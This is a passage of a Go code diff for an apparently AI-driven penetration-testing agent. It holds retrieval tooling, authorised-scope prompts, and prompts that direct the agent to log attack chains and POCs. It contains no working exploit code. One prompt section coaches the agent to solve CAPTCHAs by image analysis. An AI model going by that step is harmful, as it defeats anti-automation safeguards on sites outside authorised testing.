itemResults[i].Chunk.ChunkIndex < itemResults[j].Chunk.ChunkIndex + }) + + resultText.WriteString(fmt.Sprintf("--- 结果 %d (相似度: %.2f%%) ---\n", + resultIndex, mainResult.Similarity*100)) + resultText.WriteString(fmt.Sprintf("来源: [%s] %s (ID: %s)\n", mainResult.Item.Category, mainResult.Item.Title, mainResult.Item.ID)) + + // 按逻辑顺序显示所有chunk(包括主结果和扩展的chunk) + if len(itemResults) == 1 { + // 只有一个chunk,直接显示 + resultText.WriteString(fmt.Sprintf("内容片段:\n%s\n", mainResult.Chunk.ChunkText)) + } else { + // 多个chunk,按逻辑顺序显示 + resultText.WriteString("内容片段(按文档顺序):\n") + for i, result := range itemResults { + // 标记主结果 + marker := "" + if result.Chunk.ID == mainResult.Chunk.ID { + marker = " [主匹配]" + } + resultText.WriteString(fmt.Sprintf(" [片段 %d%s]\n%s\n", i+1, marker, result.Chunk.ChunkText)) + } + } + resultText.WriteString("\n") + + if !contains(retrievedItemIDs, group.itemID) { + retrievedItemIDs = append(retrievedItemIDs, group.itemID) + } + resultIndex++ + } + + // 在结果末尾添加元数据(JSON格式,用于提取知识项ID) + // 使用特殊标记,避免影响AI阅读结果 + if len(retrievedItemIDs) > 0 { + metadataJSON, _ := json.Marshal(map[string]interface{}{ + "_metadata": map[string]interface{}{ + "retrievedItemIDs": retrievedItemIDs, + }, + }) + resultText.WriteString(fmt.Sprintf("\n", string(metadataJSON))) + } + + // 记录检索日志(异步,不阻塞) + // 注意:这里没有conversationID和messageID,需要在Agent层面记录 + // 实际的日志记录应该在Agent的progressCallback中完成 + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: resultText.String(), + }, + }, + }, nil + } + + mcpServer.RegisterTool(searchTool, searchHandler) + logger.Info("知识检索工具已注册", zap.String("toolName", searchTool.Name)) +} + +// contains 检查切片是否包含元素 +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// GetRetrievalMetadata 从工具调用中提取检索元数据(用于日志记录) +func GetRetrievalMetadata(args map[string]interface{}) (query string, riskType string) { + if q, ok := args["query"].(string); ok { + query = q + } + if rt, ok := args["risk_type"].(string); ok { + riskType = rt + } + return +} + +// FormatRetrievalResults 格式化检索结果为字符串(用于日志) +func FormatRetrievalResults(results []*RetrievalResult) string { + if len(results) == 0 { + return "未找到相关结果" + } + + var builder strings.Builder + builder.WriteString(fmt.Sprintf("检索到 %d 条结果:\n", len(results))) + + itemIDs := make(map[string]bool) + for i, result := range results { + builder.WriteString(fmt.Sprintf("%d. [%s] %s (相似度: %.2f%%)\n", + i+1, result.Item.Category, result.Item.Title, result.Similarity*100)) + itemIDs[result.Item.ID] = true + } + + // 返回知识项ID列表(JSON格式) + ids := make([]string, 0, len(itemIDs)) + for id := range itemIDs { + ids = append(ids, id) + } + idsJSON, _ := json.Marshal(ids) + builder.WriteString(fmt.Sprintf("\n检索到的知识项ID: %s", string(idsJSON))) + + return builder.String() +} diff --git a/internal/knowledge/types.go b/internal/knowledge/types.go new file mode 100644 index 00000000..42e35e76 --- /dev/null +++ b/internal/knowledge/types.go @@ -0,0 +1,123 @@ +package knowledge + +import ( + "encoding/json" + "time" +) + +// formatTime 格式化时间为 RFC3339 格式,零时间返回空字符串 +func formatTime(t time.Time) string { + if t.IsZero() { + return "" + } + return t.Format(time.RFC3339) +} + +// KnowledgeItem 知识库项 +type KnowledgeItem struct { + ID string `json:"id"` + Category string `json:"category"` // 风险类型(文件夹名) + Title string `json:"title"` // 标题(文件名) + FilePath string `json:"filePath"` // 文件路径 + Content string `json:"content"` // 文件内容 + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// KnowledgeItemSummary 知识库项摘要(用于列表,不包含完整内容) +type KnowledgeItemSummary struct { + ID string `json:"id"` + Category string `json:"category"` + Title string `json:"title"` + FilePath string `json:"filePath"` + Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前 150 字符) + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) { + type Alias KnowledgeItemSummary + aux := &struct { + *Alias + CreatedAt string `json:"createdAt"` + UpdatedAt string `json:"updatedAt"` + }{ + Alias: (*Alias)(k), + } + aux.CreatedAt = formatTime(k.CreatedAt) + aux.UpdatedAt = formatTime(k.UpdatedAt) + return json.Marshal(aux) +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (k *KnowledgeItem) MarshalJSON() ([]byte, error) { + type Alias KnowledgeItem + aux := &struct { + *Alias + CreatedAt string `json:"createdAt"` + UpdatedAt string `json:"updatedAt"` + }{ + Alias: (*Alias)(k), + } + aux.CreatedAt = formatTime(k.CreatedAt) + aux.UpdatedAt = formatTime(k.UpdatedAt) + return json.Marshal(aux) +} + +// KnowledgeChunk 知识块(用于向量化) +type KnowledgeChunk struct { + ID string `json:"id"` + ItemID string `json:"itemId"` + ChunkIndex int `json:"chunkIndex"` + ChunkText string `json:"chunkText"` + Embedding []float32 `json:"-"` // 向量嵌入,不序列化到 JSON + CreatedAt time.Time `json:"createdAt"` +} + +// RetrievalResult 检索结果 +type RetrievalResult struct { + Chunk *KnowledgeChunk `json:"chunk"` + Item *KnowledgeItem `json:"item"` + Similarity float64 `json:"similarity"` // 相似度分数 + Score float64 `json:"score"` // 与 Similarity 相同:余弦相似度 +} + +// RetrievalLog 检索日志 +type RetrievalLog struct { + ID string `json:"id"` + ConversationID string `json:"conversationId,omitempty"` + MessageID string `json:"messageId,omitempty"` + Query string `json:"query"` + RiskType string `json:"riskType,omitempty"` + RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项 ID 列表 + CreatedAt time.Time `json:"createdAt"` +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (r *RetrievalLog) MarshalJSON() ([]byte, error) { + type Alias RetrievalLog + return json.Marshal(&struct { + *Alias + CreatedAt string `json:"createdAt"` + }{ + Alias: (*Alias)(r), + CreatedAt: formatTime(r.CreatedAt), + }) +} + +// CategoryWithItems 分类及其下的知识项(用于按分类分页) +type CategoryWithItems struct { + Category string `json:"category"` // 分类名称 + ItemCount int `json:"itemCount"` // 该分类下的知识项总数 + Items []*KnowledgeItemSummary `json:"items"` // 该分类下的知识项列表 +} + +// SearchRequest 搜索请求 +type SearchRequest struct { + Query string `json:"query"` + RiskType string `json:"riskType,omitempty"` // 可选:指定风险类型 + SubIndexFilter string `json:"subIndexFilter,omitempty"` // 可选:仅保留 sub_indexes 含该标签的行(含未打标旧数据) + TopK int `json:"topK,omitempty"` // 返回 Top-K 结果,默认 5 + Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认 0.7 +} diff --git a/internal/project/blackboard.go b/internal/project/blackboard.go new file mode 100644 index 00000000..6684ca2c --- /dev/null +++ b/internal/project/blackboard.go @@ -0,0 +1,78 @@ +package project + +import ( + "fmt" + "sort" + "strings" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" +) + +// AppendSystemPromptBlock 将附加块追加到 system prompt。 +func AppendSystemPromptBlock(base, block string) string { + base = strings.TrimSpace(base) + block = strings.TrimSpace(block) + if block == "" { + return base + } + if base == "" { + return block + } + return base + "\n\n" + block +} + +// BuildFactIndexBlock 为 Agent 系统提示生成项目黑板索引(仅 key + summary,不含 body)。 +func BuildFactIndexBlock(db *database.DB, projectID string, cfg config.ProjectConfig) (string, error) { + if db == nil || !cfg.Enabled { + return "", nil + } + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return "", nil + } + + proj, err := db.GetProject(projectID) + if err != nil { + return "", err + } + + facts, err := db.ListProjectFactsForIndex(projectID, cfg.DefaultInjectDeprecated) + if err != nil { + return "", err + } + if len(facts) == 0 { + return fmt.Sprintf("## 项目黑板索引(project: %s, id: %s)\n(暂无事实)\n需要写入请使用 upsert_project_fact;需要详情请调用 get_project_fact(fact_key)。", proj.Name, proj.ID), nil + } + + sort.SliceStable(facts, func(i, j int) bool { + if facts[i].Pinned != facts[j].Pinned { + return facts[i].Pinned + } + return facts[i].UpdatedAt.After(facts[j].UpdatedAt) + }) + + maxRunes := cfg.FactIndexMaxRunesEffective() + var b strings.Builder + b.WriteString(fmt.Sprintf("## 项目黑板索引(project: %s, id: %s)\n", proj.Name, proj.ID)) + used := len([]rune(b.String())) + omitted := 0 + + for _, f := range facts { + line := fmt.Sprintf("- [%s] %s — %s (%s)\n", f.FactKey, f.Category, strings.TrimSpace(f.Summary), f.Confidence) + lineRunes := len([]rune(line)) + if used+lineRunes > maxRunes { + omitted++ + continue + } + b.WriteString(line) + used += lineRunes + } + + if omitted > 0 { + b.WriteString(fmt.Sprintf("\n(另有 %d 条未列入索引,请使用 list_project_facts 或 search_project_facts 查询。)\n", omitted)) + } + b.WriteString("需要完整内容(攻击链、POC、请求响应等)时必须调用 get_project_fact(fact_key),禁止凭摘要臆造细节。\n") + b.WriteString("写入事实时:summary 写「什么+在哪+如何验证」;body 写可复现全流程(发现/利用类 fact_key 建议 finding|chain|exploit|poc/ 前缀)。\n") + return b.String(), nil +} diff --git a/internal/project/fact_recording_prompt.go b/internal/project/fact_recording_prompt.go new file mode 100644 index 00000000..1e02e650 --- /dev/null +++ b/internal/project/fact_recording_prompt.go @@ -0,0 +1,100 @@ +package project + +import ( + "strings" + + "cyberstrike-ai/internal/mcp/builtin" +) + +// 边渗透边记录:统一节奏文案(agents/*.md 须与 FactRecordingIncrementalRhythmMarkdown 保持一致)。 +const ( + factRhythmCore = "勿等会话结束或收尾再批量写入。每**确认**一条新认知(开放端口/服务版本、入口路径、认证态或凭据特征、可利用点或攻击面变化)后,**立即**调用 `upsert_project_fact`(同 fact_key 覆盖更新)。每**验证**出一条可复现漏洞(含 POC/影响)后,**立即**调用 `record_vulnerability`;与事实可各记一次。继续下一步工作前优先落库,避免上下文压缩后细节丢失。未绑项目时说明无法写黑板,仍在本轮保留证据摘要。" + factRhythmCoordinatorSuffix = "委派/子任务返回新认知或漏洞时,由协调者及时写入,勿假定子代理已记。" + factRhythmSubAgentSuffix = "若工具集中无上述工具,须在交付物末尾给出「待落库」结构化条目(fact_key 建议、summary、body/POC 要点),供协调者**立即**写入。" +) + +// FactRecordingIncrementalRhythmMarkdown 返回边渗透边记录节奏(Markdown,供 agents/*.md 与文档对齐)。 +func FactRecordingIncrementalRhythmMarkdown(coordinator, subAgent bool) string { + var b strings.Builder + b.WriteString("- **边渗透边记录(强制节奏)**:") + b.WriteString(factRhythmCore) + if coordinator { + b.WriteString(factRhythmCoordinatorSuffix) + } + if subAgent { + b.WriteString(factRhythmSubAgentSuffix) + } + return b.String() +} + +func factRecordingIncrementalRhythmBuiltin(coordinator, subAgent bool) string { + var b strings.Builder + b.WriteString("- **边渗透边记录(强制节奏)**:勿等会话结束或收尾再批量写入。每**确认**一条新认知(开放端口/服务版本、入口路径、认证态或凭据特征、可利用点或攻击面变化)后,**立即**调用 ") + b.WriteString(builtin.ToolUpsertProjectFact) + b.WriteString("(同 fact_key 覆盖更新)。每**验证**出一条可复现漏洞(含 POC/影响)后,**立即**调用 ") + b.WriteString(builtin.ToolRecordVulnerability) + b.WriteString(";与事实可各记一次。继续下一步工作前优先落库,避免上下文压缩后细节丢失。未绑项目时说明无法写黑板,仍在本轮保留证据摘要。") + if coordinator { + b.WriteString(factRhythmCoordinatorSuffix) + } + if subAgent { + b.WriteString(factRhythmSubAgentSuffix) + } + return b.String() +} + +// FactRecordingBlackboardSection 项目黑板与漏洞记录的完整系统提示块(单/多 Agent 主代理共用)。 +// coordinatorDelegate 为 true 时追加「协调者代子代理落库」说明(Deep / plan_execute / supervisor)。 +func FactRecordingBlackboardSection(coordinatorDelegate bool) string { + var b strings.Builder + b.WriteString("## 项目黑板(事实)与漏洞记录(分离)\n\n") + b.WriteString("当前对话若已绑定项目,系统会自动注入「项目黑板索引」(仅 fact_key + 摘要)。**摘要不足时必须调用 ") + b.WriteString(builtin.ToolGetProjectFact) + b.WriteString("(fact_key) 获取 body,禁止凭摘要臆造细节。**\n\n") + b.WriteString(factRecordingIncrementalRhythmBuiltin(coordinatorDelegate, false)) + b.WriteString("\n\n") + b.WriteString("- **环境/目标/认证等认知**(非正式漏洞条目):使用 ") + b.WriteString(builtin.ToolUpsertProjectFact) + b.WriteString(",fact_key 建议 `category/slug`(如 target/primary_domain),同 key 覆盖更新;body 记端口/版本/凭据特征与证据来源。\n") + b.WriteString("- **发现与利用上下文**(审计复现):fact_key 建议 finding/、chain/、exploit/、poc/ 前缀;**body 必填**完整攻击链(入口 → 步骤 → 原始请求/响应或命令 → 现象 → 关联 related_vulnerability_id),**禁止仅写结论**;summary 写「什么 + 在哪 + 如何验证」一行要点。\n") + b.WriteString("- **可交付漏洞**:使用 ") + b.WriteString(builtin.ToolRecordVulnerability) + b.WriteString(",含标题、严重程度、类型、目标、证明(POC)、影响、修复建议。记前可先 ") + b.WriteString(builtin.ToolListVulnerabilities) + b.WriteString(" 查重,详情用 ") + b.WriteString(builtin.ToolGetVulnerability) + b.WriteString("(id)(默认仅当前项目/会话)。\n") + b.WriteString("- 同一发现可能需**各记一次**(事实记**完整攻击链与 exploit 细节**供复现,漏洞记正式 findings)。误报用 ") + b.WriteString(builtin.ToolDeprecateProjectFact) + b.WriteString(" 或漏洞状态 false_positive。\n") + b.WriteString("- 事实多时用 ") + b.WriteString(builtin.ToolListProjectFacts) + b.WriteString(" / ") + b.WriteString(builtin.ToolSearchProjectFacts) + b.WriteString(" 检索。\n\n") + b.WriteString(FactRecordingGuidanceBlock()) + b.WriteString("\n\n严重程度:critical / high / medium / low / info。证明须含足够证据(请求响应、截图、命令输出等)。") + return b.String() +} + +// FactRecordingSubAgentSection 子代理边渗透边记录(无工具时输出待落库条目)。 +func FactRecordingSubAgentSection() string { + return "## 边渗透边记录\n\n" + factRecordingIncrementalRhythmBuiltin(false, true) + "\n" +} + +// FactRecordingBlackboardSectionMarkdown 与 FactRecordingBlackboardSection 等价的 Markdown(工具名为字面量,供 agents/*.md)。 +func FactRecordingBlackboardSectionMarkdown(coordinatorDelegate bool) string { + var b strings.Builder + b.WriteString("## 项目黑板(事实)与漏洞记录(分离)\n\n") + b.WriteString("当前对话若已绑定项目,系统会自动注入「项目黑板索引」(仅 `fact_key` + 摘要)。**摘要不足时必须调用 `get_project_fact(fact_key)` 获取 body,禁止凭摘要臆造细节。**\n\n") + b.WriteString(FactRecordingIncrementalRhythmMarkdown(coordinatorDelegate, false)) + b.WriteString("\n\n") + b.WriteString("- **环境/目标/认证等认知**(非正式漏洞):使用 **`upsert_project_fact`**,`fact_key` 建议 `category/slug`(如 `target/primary_domain`),同 key 覆盖更新;body 记端口/版本/凭据特征与证据来源。\n") + b.WriteString("- **发现与利用上下文**(审计复现):`fact_key` 建议 `finding/`、`chain/`、`exploit/`、`poc/` 前缀;**body 必填**完整攻击链(入口 → 步骤 → 原始请求/响应或命令 → 现象 → 关联 `related_vulnerability_id`),**禁止仅写结论**;summary 写「什么 + 在哪 + 如何验证」一行要点。\n") + b.WriteString("- **可交付漏洞**:使用 **`record_vulnerability`**(标题、描述、严重程度、类型、目标、证明 POC、影响、修复建议)。严重程度 critical / high / medium / low / info。\n") + b.WriteString("- 同一发现可能需**各记一次**(事实记可复现攻击链,漏洞记正式 findings)。误报用 **`deprecate_project_fact`** 或漏洞状态 false_positive。\n") + b.WriteString("- 事实多时用 **`list_project_facts`** / **`search_project_facts`** 检索。\n\n") + b.WriteString(FactRecordingGuidanceBlock()) + b.WriteString("\n\n严重程度:critical / high / medium / low / info。证明须含足够证据(请求响应、截图、命令输出等)。") + return b.String() +} diff --git a/internal/project/fact_template.go b/internal/project/fact_template.go new file mode 100644 index 00000000..b3856b17 --- /dev/null +++ b/internal/project/fact_template.go @@ -0,0 +1,140 @@ +package project + +import ( + "fmt" + "strings" +) + +// 事实 category 常量(写入 upsert_project_fact 的 category 字段)。 +const ( + FactCategoryTarget = "target" + FactCategoryAuth = "auth" + FactCategoryInfra = "infra" + FactCategoryBusiness = "business" + FactCategoryFinding = "finding" + FactCategoryChain = "chain" + FactCategoryExploit = "exploit" + FactCategoryPOC = "poc" + FactCategoryNote = "note" +) + +// RequiresAttackChainBody 判断该事实是否应携带可复现的攻击链 / exploit 详情(写在 body,非仅 summary)。 +func RequiresAttackChainBody(category, factKey string) bool { + c := strings.ToLower(strings.TrimSpace(category)) + switch c { + case FactCategoryFinding, FactCategoryChain, FactCategoryExploit, FactCategoryPOC, "vuln": + return true + } + key := strings.ToLower(strings.TrimSpace(factKey)) + for _, prefix := range []string{"finding/", "chain/", "exploit/", "poc/"} { + if strings.HasPrefix(key, prefix) { + return true + } + } + return false +} + +// IsSparseFactBody 攻击链类事实 body 过短或缺少关键段落时返回 true(软校验,不阻断写入)。 +func IsSparseFactBody(category, factKey, body string) bool { + if !RequiresAttackChainBody(category, factKey) { + return false + } + body = strings.TrimSpace(body) + if body == "" { + return true + } + lower := strings.ToLower(body) + // 至少应包含可复现线索:步骤/请求/命令/代码块 之一 + hasSteps := strings.Contains(lower, "攻击链") || strings.Contains(lower, "## 攻击") || + strings.Contains(lower, "## exploit") || strings.Contains(lower, "## poc") + hasHTTP := strings.Contains(lower, "```http") || strings.Contains(lower, "```bash") || + strings.Contains(lower, "curl ") || strings.Contains(lower, "get ") || strings.Contains(lower, "post ") + hasReq := strings.Contains(lower, "请求") || strings.Contains(lower, "响应") || strings.Contains(lower, "payload") + // 无攻击链/POC/请求等结构线索,视为仅结论性描述(不论长短) + return !(hasSteps || hasHTTP || hasReq) +} + +// FactBodyTemplate 按 category 返回建议的 body Markdown 骨架(供 Agent 填入真实内容)。 +func FactBodyTemplate(category, factKey string) string { + if RequiresAttackChainBody(category, factKey) { + return attackChainFactBodyTemplate + } + return envFactBodyTemplate +} + +const attackChainFactBodyTemplate = `## 结论(可验证,一句话) +<勿仅写「存在漏洞」;写明类型 + 位置 + 触发条件> + +## 目标与入口 +- 目标: +- 入口: <路径 / 接口 / 参数> +- 前置条件: <匿名 / 角色 / Cookie / 其他依赖> + +## 攻击链(逐步可复现) +1. <侦察/发现> +2. <利用/触发> +3. <影响证明(读文件、RCE 回显、越权数据等)> + +## Exploit / POC +### 请求 +` + "```http\n HTTP/1.1\nHost: ...\n...\n\n\n```" + ` + +### 响应 / 现象 +<关键响应片段、状态码、差异点> + +### 命令 / 脚本(如有) +` + "```bash\n\n```" + ` + +## 关键证据 +- <工具输出摘要 / 截图路径 / 会话或消息 ID> + +## 关联 +- related_vulnerability_id: <可选,对应 record_vulnerability 的 id> +- 依赖事实: + +## 备注与不确定性 +<待验证假设、环境差异、绕过尝试记录>` + +const envFactBodyTemplate = `## 摘要 +<该事实的核心认知> + +## 细节 +<端口/版本/路径/凭据特征/业务规则等> + +## 来源与证据 +<命令输出、响应片段、发现时间> + +## 关联 +- 相关 fact_key: <可选>` + +// FactRecordingGuidanceBlock 写入系统提示:要求事实沉淀攻击链上下文而非仅结论。 +func FactRecordingGuidanceBlock() string { + return `### 事实写入规范(审计复现 / 知识沉淀) + +- **summary**:索引用一行,须含「什么 + 在哪 + 如何触发/验证」要点,禁止只写结论(如仅写「存在 SQLi」)。 +- **body**:完整可复现上下文,写入 ` + "`upsert_project_fact`" + ` 的 body 字段;索引不含 body,后续会话须靠 ` + "`get_project_fact`" + ` 取回。 +- **category / fact_key 建议**: + - 环境认知:` + "`target/`" + `、` + "`auth/`" + `、` + "`infra/`" + `、` + "`business/`" + `(body 用环境模板即可) + - 发现与利用:` + "`finding/`" + `、` + "`chain/`" + `、` + "`exploit/`" + `、` + "`poc/`" + `(**必须**用攻击链模板填满 body:入口、逐步攻击链、原始请求/响应或命令、证据、关联漏洞 ID) +- **与漏洞记录分工**:` + "`record_vulnerability`" + ` 记可交付 findings;事实记**复现所需的全部上下文**(含失败尝试、绕过、依赖会话),二者可各记一次。 +- 更新同一发现时保持相同 ` + "`fact_key`" + ` 覆盖写入,勿散落多个 key 导致上下文丢失。` +} + +// SparseBodyWarning 攻击链类事实 body 不足时的工具返回提示(不阻断保存)。 +func SparseBodyWarning(category, factKey string) string { + if !IsSparseFactBody(category, factKey, "") { + return "" + } + return fmt.Sprintf( + "\n\n⚠ 提示:category=%q / fact_key=%q 属于攻击链类事实,但 body 为空或过简。请补充完整攻击链与 POC(参考模板),便于后续审计复现。\n建议 body 骨架:\n%s", + category, factKey, FactBodyTemplate(category, factKey), + ) +} + +// SparseBodyWarningIfNeeded 根据实际 body 判断是否追加警告。 +func SparseBodyWarningIfNeeded(category, factKey, body string) string { + if !IsSparseFactBody(category, factKey, body) { + return "" + } + return SparseBodyWarning(category, factKey) +} diff --git a/internal/project/fact_template_test.go b/internal/project/fact_template_test.go new file mode 100644 index 00000000..172bc0b6 --- /dev/null +++ b/internal/project/fact_template_test.go @@ -0,0 +1,42 @@ +package project + +import ( + "strings" + "testing" +) + +func TestRequiresAttackChainBody(t *testing.T) { + cases := []struct { + cat, key string + want bool + }{ + {"finding", "note/misc", true}, + {"note", "finding/sqli-login", true}, + {"target", "target/primary_domain", false}, + {"auth", "auth/admin_cookie", false}, + {"chain", "x", true}, + {"", "exploit/rce-upload", true}, + } + for _, tc := range cases { + if got := RequiresAttackChainBody(tc.cat, tc.key); got != tc.want { + t.Errorf("RequiresAttackChainBody(%q,%q)=%v want %v", tc.cat, tc.key, got, tc.want) + } + } +} + +func TestIsSparseFactBody(t *testing.T) { + long := strings.Repeat("x", 150) + if !IsSparseFactBody("finding", "finding/x", "") { + t.Error("empty body should be sparse") + } + if !IsSparseFactBody("finding", "finding/x", long) { + t.Error("body without repro clues should be sparse") + } + body := "## 攻击链\n1. step\n## Exploit\n```http\nGET / HTTP/1.1\n```\n" + if IsSparseFactBody("finding", "finding/x", body) { + t.Error("structured body should not be sparse") + } + if IsSparseFactBody("target", "target/x", "") { + t.Error("env fact empty body is ok") + } +} \ No newline at end of file diff --git a/internal/project/scope_block.go b/internal/project/scope_block.go new file mode 100644 index 00000000..e52cf1ea --- /dev/null +++ b/internal/project/scope_block.go @@ -0,0 +1,99 @@ +package project + +import ( + "encoding/json" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" +) + +// projectScopePayload 解析 projects.scope_json(约定字段,可扩展)。 +type projectScopePayload struct { + Targets []string `json:"targets"` + Exclude []string `json:"exclude"` + Notes string `json:"notes"` +} + +// BuildScopeBlock 将项目 scope_json 格式化为 Agent 可读的授权范围块。 +func BuildScopeBlock(proj *database.Project) string { + if proj == nil { + return "" + } + raw := strings.TrimSpace(proj.ScopeJSON) + if raw == "" { + return "" + } + + var payload projectScopePayload + if err := json.Unmarshal([]byte(raw), &payload); err != nil { + return fmt.Sprintf("## 项目测试范围(project: %s)\n(scope_json 非合法 JSON,请人工核对配置)\n```\n%s\n```\n"+ + "仅对明确授权目标执行测试;超出范围须停止并说明。\n", proj.Name, truncateRunes(raw, 800)) + } + + var b strings.Builder + b.WriteString(fmt.Sprintf("## 项目测试范围(project: %s, id: %s)\n", proj.Name, proj.ID)) + b.WriteString("以下为授权边界,**必须遵守**:仅测试列出的 targets,避开 exclude,不得擅自扩大范围。\n") + + if len(payload.Targets) > 0 { + b.WriteString("\n**允许测试(targets)**:\n") + for _, t := range payload.Targets { + t = strings.TrimSpace(t) + if t != "" { + b.WriteString("- " + t + "\n") + } + } + } + if len(payload.Exclude) > 0 { + b.WriteString("\n**明确排除(exclude)**:\n") + for _, t := range payload.Exclude { + t = strings.TrimSpace(t) + if t != "" { + b.WriteString("- " + t + "\n") + } + } + } + if n := strings.TrimSpace(payload.Notes); n != "" { + b.WriteString("\n**说明(notes)**:\n" + n + "\n") + } + if len(payload.Targets) == 0 && len(payload.Exclude) == 0 && strings.TrimSpace(payload.Notes) == "" { + b.WriteString("\n(scope_json 已配置但未识别 targets/exclude/notes 字段,原始内容供参考)\n```json\n") + b.WriteString(truncateRunes(raw, 1200)) + b.WriteString("\n```\n") + } + b.WriteString("\n若目标不在 targets 内或命中 exclude,不得主动扫描/利用;需用户明确扩大授权后再继续。\n") + return b.String() +} + +func truncateRunes(s string, max int) string { + r := []rune(s) + if len(r) <= max { + return s + } + return string(r[:max]) + "…" +} + +// BuildProjectBlackboardBlock 组合测试范围 + 事实黑板索引。 +func BuildProjectBlackboardBlock(db *database.DB, projectID string, cfg config.ProjectConfig) (string, error) { + projectID = strings.TrimSpace(projectID) + if projectID == "" { + return "", nil + } + proj, err := db.GetProject(projectID) + if err != nil { + return "", err + } + parts := []string{} + if scope := strings.TrimSpace(BuildScopeBlock(proj)); scope != "" { + parts = append(parts, scope) + } + index, err := BuildFactIndexBlock(db, projectID, cfg) + if err != nil { + return "", err + } + if strings.TrimSpace(index) != "" { + parts = append(parts, index) + } + return strings.Join(parts, "\n\n"), nil +} diff --git a/internal/project/scope_block_test.go b/internal/project/scope_block_test.go new file mode 100644 index 00000000..11a5a264 --- /dev/null +++ b/internal/project/scope_block_test.go @@ -0,0 +1,40 @@ +package project + +import ( + "strings" + "testing" + + "cyberstrike-ai/internal/database" +) + +func TestBuildScopeBlock_targetsExcludeNotes(t *testing.T) { + proj := &database.Project{ + ID: "p1", + Name: "Acme", + ScopeJSON: `{"targets":["https://app.example.com"],"exclude":["*.cdn.example.com"],"notes":"仅 Web 层"}`, + } + block := BuildScopeBlock(proj) + if !strings.Contains(block, "https://app.example.com") { + t.Fatalf("missing target: %s", block) + } + if !strings.Contains(block, "cdn.example.com") { + t.Fatalf("missing exclude: %s", block) + } + if !strings.Contains(block, "仅 Web 层") { + t.Fatalf("missing notes: %s", block) + } +} + +func TestBuildScopeBlock_empty(t *testing.T) { + if BuildScopeBlock(&database.Project{Name: "X"}) != "" { + t.Fatal("expected empty") + } +} + +func TestBuildScopeBlock_invalidJSON(t *testing.T) { + proj := &database.Project{Name: "X", ScopeJSON: `{not json`} + block := BuildScopeBlock(proj) + if !strings.Contains(block, "非合法 JSON") { + t.Fatalf("unexpected: %s", block) + } +} diff --git a/internal/project/stats.go b/internal/project/stats.go new file mode 100644 index 00000000..b6e1d1b3 --- /dev/null +++ b/internal/project/stats.go @@ -0,0 +1,21 @@ +package project + +import "cyberstrike-ai/internal/database" + +// GetProjectStats 聚合项目统计(含待补全事实数)。 +func GetProjectStats(db *database.DB, projectID string) (*database.ProjectStats, error) { + stats, err := db.GetProjectStatsCounts(projectID) + if err != nil { + return nil, err + } + rows, err := db.ListProjectFactsForSparseCheck(projectID) + if err != nil { + return nil, err + } + for _, r := range rows { + if IsSparseFactBody(r.Category, r.FactKey, r.Body) { + stats.SparseFactCount++ + } + } + return stats, nil +} diff --git a/internal/project/vision_image_prompt.go b/internal/project/vision_image_prompt.go new file mode 100644 index 00000000..9cb960ac --- /dev/null +++ b/internal/project/vision_image_prompt.go @@ -0,0 +1,22 @@ +package project + +import "strings" + +// VisionImageAnalysisSection 单/多代理共用的图片分析提示(analyze_image;上下文仅保留文字摘要)。 +func VisionImageAnalysisSection() string { + var b strings.Builder + b.WriteString("## 图片分析\n\n") + b.WriteString("- 遇到图片文件(截图、验证码、登录页、报告配图)时,若存在工具 analyze_image,请传入服务器上的文件路径进行分析。\n") + b.WriteString("- 不要对二进制图片使用 read_file 指望理解内容;用户消息中「📎 xxx.png: /path」即为可传给 analyze_image 的路径。\n") + b.WriteString("- 验证码类:若已从页面或接口保存为本地图片(如 captcha.png),用 analyze_image,question 写明「只输出验证码字符」;识别失败则刷新验证码后重新保存再识;复杂滑块/行为验证码勿指望单次识图成功。\n") + b.WriteString("- 委派子代理时,若子任务含验证码/截图识读,在 task description 中写明图片路径与期望输出格式。\n") + return b.String() +} + +// AppendVisionImageAnalysisIfReady 仅在 vision.enabled 且 model 已配置时追加图片分析提示。 +func AppendVisionImageAnalysisIfReady(base string, visionReady bool) string { + if !visionReady { + return base + } + return AppendSystemPromptBlock(base, VisionImageAnalysisSection()) +} diff --git a/internal/reasoning/eino.go b/internal/reasoning/eino.go new file mode 100644 index 00000000..7dbc1306 --- /dev/null +++ b/internal/reasoning/eino.go @@ -0,0 +1,266 @@ +// Package reasoning maps user/config intent to CloudWeGo Eino OpenAI ChatModel fields +// (ReasoningEffort, ExtraFields such as thinking / reasoning_effort / output_config). +package reasoning + +import ( + "strings" + + "cyberstrike-ai/internal/config" + + einoopenai "github.com/cloudwego/eino-ext/components/model/openai" +) + +// ClientIntent is optional per-request override from ChatRequest.reasoning. +type ClientIntent struct { + Mode string + Effort string +} + +type wireProfile int + +const ( + wireNone wireProfile = iota + wireClaude + wireDeepseek + wireOpenAI + wireOutputConfig +) + +// ApplyToEinoChatModelConfig merges reasoning-related options into cfg. +// Precondition: cfg already has APIKey, BaseURL, Model, HTTPClient set. +func ApplyToEinoChatModelConfig(cfg *einoopenai.ChatModelConfig, oa *config.OpenAIConfig, client *ClientIntent) { + if cfg == nil || oa == nil { + return + } + sr := &oa.Reasoning + allowClient := sr.AllowClientReasoningEffective() + mode := effectiveMode(sr, client, allowClient) + + // Claude (Anthropic): merge admin extras first; optional extended thinking maps to top-level `thinking` + // (see internal/openai convertOpenAIToClaude). DeepSeek/OpenAI-style fields are not sent. + if strings.EqualFold(strings.TrimSpace(oa.Provider), "claude") || + strings.EqualFold(strings.TrimSpace(oa.Provider), "anthropic") { + if len(sr.ExtraRequestFields) > 0 { + if cfg.ExtraFields == nil { + cfg.ExtraFields = make(map[string]any) + } + for k, v := range sr.ExtraRequestFields { + cfg.ExtraFields[k] = v + } + } + if mode == "off" { + return + } + applyClaudeExtendedThinking(cfg, mode, effectiveEffort(sr, client, allowClient), 